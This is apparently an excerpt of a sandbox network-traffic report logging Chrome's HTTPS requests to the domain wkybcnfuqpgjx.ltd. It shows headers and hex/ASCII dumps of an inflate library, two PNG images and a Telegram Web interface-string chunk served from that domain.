                                  2025-01-12 00:03:45 UTC1369INData Raw: 30 2c 61 2e 77 6f 72 6b 2c 65 65 29 2c 61 2e 6c 65 6e 62 69 74 73 3d 65 65 2e 62 69 74 73 2c 51 29 7b 65 2e 6d 73 67 3d 22 69 6e 76 61 6c 69 64 20 63 6f 64 65 20 6c 65 6e 67 74 68 73 20 73 65 74 22 2c 61 2e 6d 6f 64 65 3d 44 3b 62 72 65 61 6b 7d 61 2e 68 61 76 65 3d 30 2c 61 2e 6d 6f 64 65 3d 31 36 31 39 38 3b 63 61 73 65 20 31 36 31 39 38 3a 66 6f 72 28 3b 61 2e 68 61 76 65 3c 61 2e 6e 6c 65 6e 2b 61 2e 6e 64 69 73 74 3b 29 7b 66 6f 72 28 3b 56 3d 61 2e 6c 65 6e 63 6f 64 65 5b 49 26 28 31 3c 3c 61 2e 6c 65 6e 62 69 74 73 29 2d 31 5d 2c 6a 3d 56 3e 3e 3e 32 34 2c 59 3d 56 3e 3e 3e 31 36 26 32 35 35 2c 47 3d 36 35 35 33 35 26 56 2c 21 28 6a 3c 3d 4e 29 3b 29 7b 69 66 28 30 3d 3d 3d 66 29 62 72 65 61 6b 20 65 3b 66 2d 2d 2c 49 2b 3d 73 5b 6c 2b 2b 5d 3c 3c
                                  Data Ascii: 0,a.work,ee),a.lenbits=ee.bits,Q){e.msg="invalid code lengths set",a.mode=D;break}a.have=0,a.mode=16198;case 16198:for(;a.have<a.nlen+a.ndist;){for(;V=a.lencode[I&(1<<a.lenbits)-1],j=V>>>24,Y=V>>>16&255,G=65535&V,!(j<=N);){if(0===f)break e;f--,I+=s[l++]<<


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  23192.168.2.649791172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:45 UTC654OUTGET /chat-bg-pattern-light.ee148af944f6580293ae.png HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  sec-ch-ua-platform: "Windows"
                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                  Sec-Fetch-Site: same-origin
                                  Sec-Fetch-Mode: no-cors
                                  Sec-Fetch-Dest: image
                                  Referer: https://wkybcnfuqpgjx.ltd/main.949acaf34f3882f511ff.css
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:45 UTC910INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:03:45 GMT
                                  Content-Type: image/png
                                  Content-Length: 272875
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:39 GMT
                                  ETag: "674840af-429eb"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: HIT
                                  Age: 6953
                                  Accept-Ranges: bytes
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YizgAoim32h8DSPCtZZrj0wkCFwlL05uc%2B63OKHhS2pPz3VSSeOVEM0F%2BOLKVrXquaB9ErGeNsYo%2FzkUYzo9%2F8Dq3BfE91uarAEFpiZpBxfjkk%2BWRyR1a7uj%2BWsxpnFkp51MfA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e29ed83a72b1-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=1836&min_rtt=1816&rtt_var=695&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1232&delivery_rate=1607929&cwnd=167&unsent_bytes=0&cid=e1715618f779e17c&ts=155&x=0"
                                  2025-01-12 00:03:45 UTC459INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 04 63 00 00 09 03 04 03 00 00 00 50 a0 9a ad 00 00 00 2a 50 4c 54 45 00 00 00 00 00 00 0d 0d 0d 12 12 12 15 15 15 12 12 12 0f 0f 0f 14 0d 0d 11 11 11 12 0d 0d 14 10 10 12 0e 0e 11 11 11 1a 1a 1a 62 a8 2b 60 00 00 00 0e 74 52 4e 53 00 05 13 0e 18 1d 22 27 2e 38 3f 46 4d 0a 93 22 99 9f 00 04 29 62 49 44 41 54 78 01 9c 5b 85 6f 23 c9 9b fd 6c 87 33 91 bc 0c 19 49 5e 26 f2 31 24 92 bc 4c 39 c9 c7 90 2c 13 65 25 2f 6f 34 3e c9 cb d4 2b 65 96 a3 f1 48 99 63 f0 49 c9 70 34 3d 52 26 31 b5 fb 45 f2 32 e5 fe 97 df 54 95 9f dc 6e 57 27 f6 be 65 37 15 bc 7a df fb be aa 95 48 cc af cb 59 14 17 e5 2c 06 90 16 85 e2 69 21 c4 d9 90 5d 30 5a 95 7e b1 07 68 fc b3 ed 55 0d 91 f1 ba 14 17 e3 ae c7 df 62 0e 36 55 9b 0a a2
                                  Data Ascii: PNGIHDRcP*PLTEb+`tRNS"'.8?FM")bIDATx[o#l3I^&1$L9,e%/o4>+eHcIp4=R&1E2TnW'e7zHY,i!]0Z~hUb6U
                                  2025-01-12 00:03:45 UTC1369INData Raw: c9 31 6a 93 93 de 31 bd 25 fd 62 c4 9b 78 16 7e d2 3a 84 09 64 b6 3d 1c 15 2e 68 54 95 f6 c8 f4 aa 50 87 dc 42 87 4c 06 3e 7f 11 1a cd 62 3f 6b 27 72 76 63 f7 b8 f0 df 89 12 ac 38 86 bd d2 aa 88 53 36 d3 ac db 36 e9 37 45 2e c1 31 fd cb 66 6f b3 80 b4 e9 63 46 88 49 4f 84 8a 6f c3 dd 1f bc 12 2d a3 14 e3 10 fe 14 75 cb 33 53 e8 8f 32 53 24 f1 de b2 fe 7b c5 fc 47 4d 84 3d ee 19 33 eb d2 2f 06 7d 25 08 96 31 71 96 15 23 c6 e0 35 39 a8 a5 46 5a 69 8f ec d9 10 8e a4 b3 d2 21 72 f5 f6 72 72 fd 1c d7 59 af b8 d1 1a 43 7e 28 02 ff 49 31 b3 53 46 05 9f 49 43 fb 69 3d 6c 09 f7 90 0c b8 ba e5 bc b0 1b 06 20 a4 09 31 c8 61 e1 c2 e8 c4 3e 00 f5 a6 d8 c1 30 fd a7 4b 9f 88 c8 07 49 21 fe 0c ff 62 51 74 b7 af d8 97 70 c1 e0 a7 9f 1b ab 53 0d 19 99 7a c7 fc 8a f4 8b 38
                                  Data Ascii: 1j1%bx~:d=.hTPBL>b?k'rvc8S667E.1focFIOo-u3S2S${GM=3/}%1q#59FZi!rrrYC~(I1SFICi=l 1a>0KI!bQtpSz8
                                  2025-01-12 00:03:45 UTC1369INData Raw: 76 85 95 d1 7b 5c 93 9f 94 16 85 70 80 43 5c 59 7d 82 82 c1 20 bd 33 65 74 5e 33 ea 37 65 14 19 d6 f9 a3 12 30 56 80 bc 6e ca 94 db a9 f6 5e 00 f5 36 2f 26 2b 3b 50 66 3e 92 32 65 11 18 ca a4 f4 8c 4c e1 14 b6 68 73 34 7e 65 66 a3 69 25 04 9d 6c 9e 5a c1 68 93 be 72 a1 88 4a d0 b4 1a 52 b2 42 d0 56 f5 31 7b 64 82 1b ea 0a 5f c0 26 4d 20 d7 bf fd 1d 2b 33 83 e1 eb 99 5f cb 73 d8 6f 46 62 08 4d 61 0b dd 82 29 d0 7a cf 8b c9 c1 09 14 e6 3d 72 b8 6f cc 99 56 24 76 a7 dc 58 4d ab 72 cc 5d 96 98 7b 86 91 a9 45 a2 08 fc 39 0a d6 c0 c4 82 de 08 80 4d 56 55 29 fb fd 04 26 56 d9 8a 41 95 49 94 e0 a5 85 5a 46 8f ce 48 72 30 44 49 5f e7 1a 9c 78 96 b4 45 be 49 93 32 54 85 40 6b 74 71 9e 1a 6b ab c1 dd 17 ce 1e 99 ca 8c 1b f6 fe b2 b3 97 19 fc 37 52 86 aa c4 d5 d6 1a
                                  Data Ascii: v{\pC\Y} 3et^37e0Vn^6/&+;Pf>2eLhs4~efi%lZhrJRBV1{d_&M +3_soFbMa)z=roV$vXMr]{E9MVU)&VAIZFHr0DI_xEI2T@ktqk7R
                                  2025-01-12 00:03:45 UTC1369INData Raw: 73 96 2d 9e 39 2b ba 96 ea c0 4f 0a ec a1 27 86 94 56 c9 3f 75 6d 9c e1 dc 75 55 56 d5 2f 9c 5f fe b2 48 95 89 a3 a0 8d 57 71 51 ad ea 98 d3 f5 69 1e 83 b0 52 86 c1 79 ca e7 bc cd 99 74 65 10 fc a1 2b dd ff 9f 2f 53 12 8d 41 f5 c6 0b 97 de 12 99 f5 d3 c1 84 96 13 1b 88 57 89 0f 55 b8 b0 f4 94 2e 88 83 4b a8 a4 07 47 f4 8c 93 9e 5c d0 91 91 89 77 d1 76 73 f5 ed 96 99 30 81 25 2f b7 cb 32 8b 63 81 7e 06 2d 7f 2b bf be 04 34 32 94 27 a6 4c ce ca b5 25 e0 3f d3 1d 25 a8 b9 8a a6 cc e0 81 4f a3 77 ed 90 32 94 bf c0 c5 bf 8b 15 bf 86 0b 81 34 85 dc 28 64 cc 27 7d c5 d9 98 c5 1b 8a ce ca 76 ce e2 b0 a5 20 b3 2c a4 4c f8 38 25 ad 76 82 a5 89 8b b1 ca 71 fe 8d a0 60 dd 87 a3 9d 3c e5 f9 ee 99 8a 50 3d 81 2f d8 25 2e 85 56 b3 0c 75 42 de 5c 27 3d 9f 27 4d 90 60 58
                                  Data Ascii: s-9+O'V?umuUV/_HWqQiRyte+/SAWU.KG\wvs0%/2c~-+42'L%?%Ow24(d'}v ,L8%vq`<P=/%.VuB\'='M`X
                                  2025-01-12 00:03:45 UTC1369INData Raw: e1 6d 54 0f 21 bb c5 9c 39 70 3d 8f f6 60 53 2d 9c e7 61 9b ab 68 f0 09 90 ca e2 17 49 d6 a8 f1 dd 0a b9 ca c3 08 63 23 ed e5 b7 a4 a4 3b f1 66 8c 66 55 b6 89 08 48 25 d7 aa e7 9c 0e e9 0a 3a 8a 75 64 d6 65 fc 48 85 3b 1a f2 7b 66 06 03 dc d2 09 4e 1e 7d fc 5a 51 83 03 dd 30 eb 2c 8d fb 3f 3e da fa 5d 5b d8 8e 37 13 58 8c aa b6 12 54 e0 a6 b2 72 aa 30 4a b4 ef e9 8e 98 83 8c 7e 22 3b 3a fa 33 78 d9 f2 cd 84 e9 b2 3c 01 60 8f 0a 5a 37 7a af 1d b4 8a ec 49 b8 13 90 cb fc 26 94 bb 46 86 44 46 b2 ca 27 5c 07 c8 df 3c 00 36 41 af d8 1d 16 1a 20 77 04 d6 d3 31 2d 96 3d b4 5b ee b9 ae b6 d2 34 99 30 db 45 8c e7 f9 5c 46 4e 10 96 33 6b bb e7 a5 c0 c9 ae 77 60 47 cc 7a 54 8e 9c c9 17 c2 46 ac fa e3 f3 04 c3 e7 d6 92 e6 a4 1c 39 5f 22 4d 32 50 9c 48 e3 a3 cc ab 05
                                  Data Ascii: mT!9p=`S-ahIc#;ffUH%:udeH;{fN}ZQ0,?>][7XTr0J~";:3x<`Z7zI&FDF'\<6A w1-=[40E\FN3kw`GzTF9_"M2PH
                                  2025-01-12 00:03:45 UTC1369INData Raw: 81 06 72 84 81 6d 23 7d c0 77 d3 79 1b b2 43 72 32 19 1a 03 ff 62 79 44 d0 d0 55 5b b7 e9 75 9e 5e f2 df c8 ef b3 25 3b cc e5 bd 58 bd 74 d1 63 84 57 68 c9 59 c2 cd 76 93 d9 ae 7e a2 25 77 90 03 ef 14 08 d5 52 88 cb ac 6e 06 26 81 60 12 fb de 1b 82 17 66 df 73 b7 b8 ff 4c ec 92 2c fc ec 12 86 19 2a e0 8e 0d b6 3e ab 44 8b 58 68 95 3d 2d 4e af b1 02 6f ec df 30 39 c9 2b 5c 02 e6 87 41 b3 07 fd fc 69 b9 e7 ce 32 bc a2 97 a0 30 00 8a 53 e4 bf dc 72 55 84 46 9d 66 42 87 02 59 eb a2 c7 bc d8 5d f4 73 ec 58 de 2d c6 e8 dc cd a6 a0 2c 17 08 d5 16 77 df a2 b2 6a d4 98 4a 58 b4 d8 ed b9 07 bc 8f e2 86 37 1c 1f fc c1 25 0b 33 54 08 0e f1 70 da 86 4c b7 56 4e d0 49 3f 7b 54 ac 9f 8d 33 3e 90 7d 21 25 c7 e8 59 a8 f8 8a 61 0c 82 2a 39 29 f5 dc 7f c7 78 34 92 36 a5 c1
                                  Data Ascii: rm#}wyCr2byDU[u^%;XtcWhYv~%wRn&`fsL,*>DXh=-No09+\Ai20SrUFfBY]sX-,wjJX7%3TpLVNI?{T3>}!%Ya*9)x46
                                  2025-01-12 00:03:45 UTC1369INData Raw: d2 97 74 b8 3b 33 69 86 87 e6 67 f3 31 1b aa f6 cb 80 16 5d 68 61 71 ba e4 eb 58 13 f9 77 f7 6f 9f 6d 98 17 d5 57 ea cf 5d 83 35 00 5a 78 fe b7 bf b8 db 99 59 d9 af c8 c8 6a 28 2d 8a 7f 56 d9 3f 64 73 95 15 c6 6e 5f aa 5c a2 7a 28 b6 fc e9 59 69 d8 90 97 11 59 81 e4 77 83 5c 89 b3 ad 75 66 c9 58 a8 39 bc ab ac f2 ff 14 5e 2d 81 fd 63 d8 13 6f ed bf 3a 4b 7f 62 0e 50 70 fb f9 98 57 e4 4c fa 73 51 8c 1c e9 7d e3 80 36 d1 c6 5f 5a 6f 77 9c a4 d9 7d 8b 6b 05 22 e2 b0 07 6d 78 fc 81 ef 5c b7 83 ec 62 d4 10 56 7f 26 56 1f 5d 3c 28 bd da ce 77 4b 88 6f 6a 43 a6 af 6f 42 bb 7e f1 04 42 25 84 c4 a8 b7 45 f4 b3 cf 0c 6a bf f6 33 4f db f0 78 61 b9 15 8c f2 c2 57 2a fb b1 17 e4 85 10 a0 66 4b 74 f4 c6 92 5a 10 4c d9 b5 0d 42 a4 d6 48 22 03 7a 70 aa b5 1e 10 cc d0 5f
                                  Data Ascii: t;3ig1]haqXwomW]5ZxYj(-V?dsn_\z(YiYw\ufX9^-co:KbPpWLsQ}6_Zow}k"mx\bV&V]<(wKojCoB~B%Ej3OxaW*fKtZLBH"zp_
                                  2025-01-12 00:03:45 UTC1369INData Raw: 49 30 2f 7d 26 9e 2f d2 95 94 49 d6 18 7a dd 10 28 72 cc 38 b5 16 ad 15 27 e7 76 56 9b c6 4f 23 c3 1a a6 45 e7 9f fe cd 49 9c 0e 28 e0 f0 69 aa c9 ba 7c 54 40 d4 08 59 9f 39 24 04 69 a1 fd e7 3b 5f ab 6c 04 6a c9 65 f6 80 73 f7 09 d3 c3 32 35 da 94 aa eb 17 bd fd 9c 19 e9 fc 38 2e 93 24 2d f5 06 d1 db be c6 18 5c c6 11 a1 d1 d6 2c 4c 4f 5f 3f bd b9 6e 92 db 5c 33 ec 49 29 51 ce f8 ca f0 cf 1a 50 ad 82 4d d0 5f 7e b7 a3 2f ea 02 7c b9 14 49 2e 33 83 50 82 c7 e9 9f 27 0f d9 0c 73 21 1a 11 1c 96 24 77 8f cb ea b6 0f 8d 2c 09 1d 82 d1 63 95 88 16 bd d4 7b 28 33 a7 ce 8a f9 34 6a 59 c7 51 ab 7b e0 b2 19 5b 5c 47 b4 6b da b4 8b 0a f9 fd 2a d5 a4 4d 63 9d 8a c8 dd b8 d9 b5 fd 7a c3 2e ba 3f 11 2f 02 2e 83 35 87 ac 15 10 61 c3 9f 34 4c e7 1b cf 4d bf 5e df 4d 8e
                                  Data Ascii: I0/}&/Iz(r8'vVO#EI(i|T@Y9$i;_ljes258.$-\,LO_?n\3I)QPM_~/|I.3P's!$w,c{(34jYQ{[\Gk*Mcz.?/.5a4LM^M
                                  2025-01-12 00:03:45 UTC1369INData Raw: e9 d6 1a 8c 3b 1b cf 08 5f 14 ea 7f 8a e9 49 38 a5 11 da 62 1c d2 3c 25 52 fb f7 79 ea d4 78 90 30 bc 36 f8 44 82 3a 53 54 5a be 84 13 8a dc 58 78 14 a6 da 62 80 63 98 35 51 33 52 2b 2f 48 7c 44 40 b4 a6 6f d8 62 d2 51 36 eb dd 47 8e 1d 02 85 57 ef 77 27 08 e5 9f dc e1 13 e9 b5 03 b1 d0 1b e7 c4 8e 37 1d f5 61 87 70 f9 c8 eb 0f ff 7a ec e7 3d 08 6f f7 ba 7a 89 9b a1 d8 cf c0 67 a8 5d 8a 01 55 18 6a 6b 70 8b c3 51 48 c7 23 95 fd 28 ae 24 9c a3 26 8d c5 97 31 6e 67 94 57 d2 41 b1 a3 4c 8b 4a 0c 08 5c 5e c1 b9 2c 4f b9 86 0c b2 df 62 bb 72 28 c9 d5 86 07 8b 82 7e 66 78 97 7b b4 2f 9c 96 87 f2 d9 26 4a 7f 71 5b 18 62 3f 24 b1 f9 f9 8e 78 6d 98 e0 82 f9 41 36 31 80 70 9a 5d 76 51 e2 c4 12 ee 23 b2 4a 2a 30 77 a5 e1 c0 ba 8e 8f 74 f5 0b ff f9 43 16 b7 5d 59 0c
                                  Data Ascii: ;_I8b<%Ryx06D:STZXxbc5Q3R+/H|D@obQ6GWw'7apz=ozg]UjkpQH#($&1ngWALJ\^,Obr(~fx{/&Jq[b?$xmA61p]vQ#J*0wtC]Y
                                  2025-01-12 00:03:45 UTC1369INData Raw: 6b e4 fa 2d 90 c3 c8 49 bf 79 dc c6 17 49 a2 22 88 6f 40 6a 63 e1 01 e1 a1 51 16 a7 2f d9 4f 28 86 52 82 f5 4c a4 28 44 60 ce bf 89 b6 09 19 a2 00 57 ff af e8 28 16 9a cc 9a 8a c2 25 48 13 61 3f 9a dc e0 83 27 a1 91 0c 97 e1 09 c2 73 8d bd 32 01 ea 0c 0a 91 43 5a df 06 a5 1a 81 83 e7 f9 ab d4 24 d3 d2 8b b8 62 b6 fe 6b f6 f0 77 c4 f1 72 a1 d3 3a b9 f6 32 ee a2 bc 54 14 1e c1 71 eb f3 05 23 15 c2 a2 8f cb e0 80 60 9f a3 b1 be 8e 05 b4 63 3d e8 47 dd e4 07 90 e0 6d 01 f3 9f 5d 70 1f ec 87 8f e6 7d 6a a1 ef 74 4b 01 8a a8 55 56 2f 8a 07 f6 b3 91 00 1c cc 9e a7 53 d8 7b b3 00 fa 93 e1 48 c0 c6 f2 1e 0d b5 48 2c 3a f7 1d 66 3e 9b 27 5a b8 b8 42 f2 93 cd f3 0e 51 8b 97 48 42 1d 34 78 98 d7 55 40 29 07 28 66 c7 44 ab df 1d b8 a4 68 03 11 2d dc 2f 73 9f c0 26 ba
                                  Data Ascii: k-IyI"o@jcQ/O(RL(D`W(%Ha?'s2CZ$bkwr:2Tq#`c=Gm]p}jtKUV/S{HH,:f>'ZBQHB4xU@)(fDh-/s&


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  24192.168.2.649795172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:45 UTC376OUTGET /chat-bg-br.f34cc96fbfb048812820.png HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:45 UTC903INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:03:45 GMT
                                  Content-Type: image/png
                                  Content-Length: 1920
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:39 GMT
                                  ETag: "674840af-780"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: HIT
                                  Age: 6953
                                  Accept-Ranges: bytes
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nHvwL2dPGNRC7TtZ%2FyidkuIi1aSzhN51gvlpGHeswGtDmfUBEWA4vXUKLi41%2B1shVQEZoVi0VTnwDHXp%2BWu5yg4Uz4ZafZQzpAHXE5WIZ2endEQlFY%2F7RP2LqcrZZTySFBNa%2BQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e2a10cd542dd-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=1709&min_rtt=1704&rtt_var=650&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2843&recv_bytes=954&delivery_rate=1667618&cwnd=186&unsent_bytes=0&cid=c777c21adb5f9798&ts=368&x=0"
                                  2025-01-12 00:03:45 UTC466INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 32 00 00 00 32 08 02 00 00 00 91 5d 1f e6 00 00 07 47 49 44 41 54 78 01 8d d6 09 4f 1b c7 1b c7 f1 79 c5 ff b3 f7 7d 9a 31 2c b0 98 0d 72 23 b7 da 48 39 36 91 43 1d 6a c0 98 c5 d9 a4 16 b5 12 73 e7 4e 5e 4c 7f 33 3f fb e1 d9 0b 2a 7d 35 1a 13 49 f3 e9 33 83 a9 79 fd 61 1f bd a9 09 ff f4 ea fd 90 bd 78 b7 f7 e2 cd e0 d4 37 7d bd 3b 79 d1 1f bf e8 65 a7 bd f4 b4 37 98 76 fb 93 a4 37 49 92 f1 ed db 59 1c 67 71 27 8b db 69 27 4a db e1 a0 1d 0c da 76 70 a3 d1 8f 7e ea 47 df 6d ad 7d d7 0b bf e9 85 5f f5 c2 2f 36 57 3f db 5c f9 ec e1 ca 27 dd 00 7d 84 1e b8 fe ff 60 c9 bc 7e 3f ac 63 39 b1 32 a1 f3 b7 ce 74 fc 66 67 fa a2 ef 58 67 bf 67 34 4d bb 30 75 61 1a df aa 30 f5 23 9a 7e d8 6a 89 09 69 93 80 fe 77
                                  Data Ascii: PNGIHDR22]GIDATxOy}1,r#H96CjsN^L3?*}5I3yax7};ye7v7IYgq'i'Jvp~Gm}_/6W?\'}`~?c92tfgXgg4M0ua0#~jiw
                                  2025-01-12 00:03:45 UTC1369INData Raw: 13 40 da c4 aa 4c 64 61 12 94 91 c2 64 48 ca 84 1e c1 34 ff fe 4c ea 47 55 6d 82 86 11 a4 4c ac 99 63 1d bf e9 e3 78 24 14 e6 40 6f fa 30 f1 ee 0e 5f 3c 1a 9f 73 54 dd c2 a8 c0 92 2f 2a 3d aa cf 37 03 b0 f4 c5 31 80 98 36 15 59 38 9b 32 86 3d 22 a8 d2 54 fe f3 d7 ce 3a 72 83 ea 55 f1 49 d5 b2 18 4d e5 0c ce 06 42 d2 20 5e 1c de 93 32 a1 a4 30 aa f6 41 3b 77 83 5b 6b c2 12 19 34 d5 b2 c4 6a 8d 7c 34 38 18 02 38 94 e6 11 3b bc 34 6d c2 84 60 f2 a3 82 89 7f 95 39 2a b2 22 b2 64 5a fe 12 c1 42 4b 7e 66 a8 c9 88 23 0b 1f a9 c1 c6 d5 b5 c8 1c 12 c1 2a 40 73 d3 b1 37 4d 9d 29 37 aa ac ad 59 7a 5a 64 21 b0 18 ce 13 99 46 60 f3 69 d7 22 ec b9 31 f8 1e 82 40 47 90 ff 7e ea a2 4a 93 1f 15 58 bf e0 06 1d 6b 2f f2 ac 90 2c ff e4 03 34 97 2d 12 27 e1 27 dc 40 80 3d 29
                                  Data Ascii: @LdadH4LGUmLcx$@o0_<sT/*=716Y82="T:rUIMB ^20A;w[k4j|488;4m`9*"dZBK~f#*@s7M)7YzZd!F`i"1@G~JXk/,4-''@=)
                                  2025-01-12 00:03:45 UTC85INData Raw: 56 21 43 7a 6c e8 ba 99 19 ce 86 20 57 bf e1 b3 f3 bd c5 aa 59 4b 7d 99 16 64 79 56 46 96 c8 78 9b 82 a3 0c 5d 2b 23 6b 9b 2c 31 31 cb 95 d5 c9 c0 42 71 49 b6 45 19 52 32 3d b3 ba db 44 90 fd 0d 46 e2 25 ab 51 73 31 15 00 00 00 00 49 45 4e 44 ae 42 60 82
                                  Data Ascii: V!Czl WYK}dyVFx]+#k,11BqIER2=DF%Qs1IENDB`


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  25192.168.2.649796172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:45 UTC369OUTGET /5193.75042954cc9da1f6d6ac.js HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:45 UTC922INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:03:45 GMT
                                  Content-Type: application/javascript
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:39 GMT
                                  Vary: Accept-Encoding
                                  ETag: W/"674840af-47f6"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: HIT
                                  Age: 6953
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yQmnkSrnJJJywVh9cIL%2FIffXMCsodDCbEzLVBb2%2FXGRQjOTADhJcZ1A21h2KBUMoC23ur5fMWyzJ2KtQsoADmv28be4VbClQ3zaUuYm363%2FSwmiYL7YxlbBpqvYS6AjI2BLWDw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e2a10ceb0dc7-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=1866&min_rtt=1834&rtt_var=751&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2843&recv_bytes=947&delivery_rate=1397129&cwnd=218&unsent_bytes=0&cid=c34b3885e1148bc3&ts=323&x=0"
                                  2025-01-12 00:03:45 UTC447INData Raw: 34 37 66 36 0d 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 74 65 6c 65 67 72 61 6d 5f 74 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 74 65 6c 65 67 72 61 6d 5f 74 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 35 31 39 33 5d 2c 7b 35 31 39 33 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 6e 2e 72 28 74 29 2c 6e 2e 64 28 74 2c 7b 64 65 66 61 75 6c 74 3a 28 29 3d 3e 61 7d 29 3b 63 6f 6e 73 74 20 61 3d 7b 53 65 61 72 63 68 3a 22 53 65 61 72 63 68 22 2c 53 61 76 65 64 4d 65 73 73 61 67 65 73 3a 22 53 61 76 65 64 20 4d 65 73 73 61 67 65 73 22 2c 41 72 63 68 69 76 65 64 43 68 61 74 73 3a 22 41 72 63 68 69 76 65 64 20 43 68 61 74 73 22 2c 43 6f 6e 74 61 63 74 73 3a 22 43 6f 6e 74 61 63 74 73 22 2c 53 65 74 74 69 6e 67 73
                                  Data Ascii: 47f6"use strict";(self.webpackChunktelegram_t=self.webpackChunktelegram_t||[]).push([[5193],{5193:(e,t,n)=>{n.r(t),n.d(t,{default:()=>a});const a={Search:"Search",SavedMessages:"Saved Messages",ArchivedChats:"Archived Chats",Contacts:"Contacts",Settings
                                  2025-01-12 00:03:45 UTC1369INData Raw: 65 6e 20 6d 65 6e 75 22 2c 4e 65 77 4d 65 73 73 61 67 65 54 69 74 6c 65 3a 22 4e 65 77 20 4d 65 73 73 61 67 65 22 2c 4e 65 77 43 68 61 6e 6e 65 6c 3a 22 4e 65 77 20 43 68 61 6e 6e 65 6c 22 2c 4e 65 77 47 72 6f 75 70 3a 22 4e 65 77 20 47 72 6f 75 70 22 2c 22 43 6f 6d 6d 6f 6e 2e 43 6c 6f 73 65 22 3a 22 43 6c 6f 73 65 22 2c 46 69 6c 74 65 72 41 6c 6c 43 68 61 74 73 3a 22 41 6c 6c 20 43 68 61 74 73 22 2c 4d 61 72 6b 41 73 55 6e 72 65 61 64 3a 22 4d 61 72 6b 20 61 73 20 75 6e 72 65 61 64 22 2c 55 6e 70 69 6e 46 72 6f 6d 54 6f 70 3a 22 55 6e 70 69 6e 20 66 72 6f 6d 20 74 6f 70 22 2c 22 43 68 61 74 4c 69 73 74 2e 4d 75 74 65 22 3a 22 4d 75 74 65 22 2c 41 72 63 68 69 76 65 3a 22 41 72 63 68 69 76 65 22 2c 44 65 6c 65 74 65 3a 22 44 65 6c 65 74 65 22 2c 44 65 6c
                                  Data Ascii: en menu",NewMessageTitle:"New Message",NewChannel:"New Channel",NewGroup:"New Group","Common.Close":"Close",FilterAllChats:"All Chats",MarkAsUnread:"Mark as unread",UnpinFromTop:"Unpin from top","ChatList.Mute":"Mute",Archive:"Archive",Delete:"Delete",Del
